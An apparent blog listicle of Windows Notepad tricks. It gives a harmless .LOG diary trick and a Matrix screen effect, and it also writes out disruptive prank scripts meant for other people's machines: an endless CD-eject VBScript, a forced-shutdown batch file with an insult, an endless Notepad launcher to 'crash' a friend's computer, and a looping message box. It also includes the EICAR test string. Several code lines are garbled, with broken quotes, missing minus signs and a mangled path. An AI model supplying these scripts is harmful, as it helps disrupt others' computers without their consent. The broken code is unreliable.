Top 10 Most Amazing Notepad Tricks
But here we give you some cool notepad tricks that gonna make your boring Notepad Software into a interestable program. You can do many things from Notepad Program like creating programs, modify system files, hack hardware, create virus from notepad and many more things. You can also give your computer a commands from notepad program.
These Notepad Tricks works in all window versions like Windows 7, Window 8 and Window 10. Here we post vbs notepad tricks and notepad hacks for window 7, 8 and 10.
Methods for Opening Notepad Program in Windows PC
You can Notepad Text Editor from many ways but here we mention three quick fast way for opening Notepad Programs in Windows PC.
Method 1: Press Window + R button and type notepad , Now press Enter Button.
Open Notepad.exe from Run Program
Method 2: Press Window Button and search notepad.exe in search bar. Select Notepad.exe program in result.
Open Notepad from Windows Search
Method 3: Or You can Pin Notepad.exe to task bar.
Pin Notepad.exe to taskbar
Cool Tricks that You can Do with Your Notepad Program
1. Create CD Virus from Notepad (continuously pop out CD Drive)
Open Notepad and Write down below codes:
Set oWMP = CreateObject(WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as cdvirus.vbs.
If you accidentally open this file in your system, your cd pop-out continuously. For closing this shit , you need to reboot your Windows Computer.
2. Create Notepad Virus that Shutdown your Friend Computer with Message
Open Notepad and Type:-
@echo off
Shutdown.exe -s -t 10
cls
msg * I dont like you SHIT!
Save it as shutdownvirus.bat.
3. Open 100s of Notepad Tab in Your Computer for Crashing Friend Computer.
@ECHO off
:top
START %SystemRoot%system32 otepad.exe
GOTO top
Save it as Unlimitednotepad.bat and send it to your friends.
4. Make A Personal Log-Book or A Diary
Open Notepad and type:
.LOG (in capital letters)
Save it as personaldiary.txt.
Open it again.
When you open the file again you will see the current date and time being inserted automatically after the .LOG line. This will happen automatically every time you reopen the notepad file.
5. Test Your Anti-Virus Program effectiveness
Test your antivirus is work or not from type this below code in your notepad.
Copy the code give below in your notepad file:
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Save it as virus.exe in your computer.
When you save that file in your Computer , you antivirus prompt and say this is working virus. So you know antivirus is working properly in your Window PC Computer.
6. Create Matrix Movie Computer Screen Effects in Your Computer
Open Noteapd and Type:
Copy the below mentioned text in your notepad file:
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start
Save the file name asmatrix .bat in your Computer.
7. Constantly Repeat Notepad Messages
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save the file name but with continue.bat extension in your computer. When you open this file in your computer , you see message line by line without type anything.
8. Convert Text Into Audio from Notepad Program
Read more »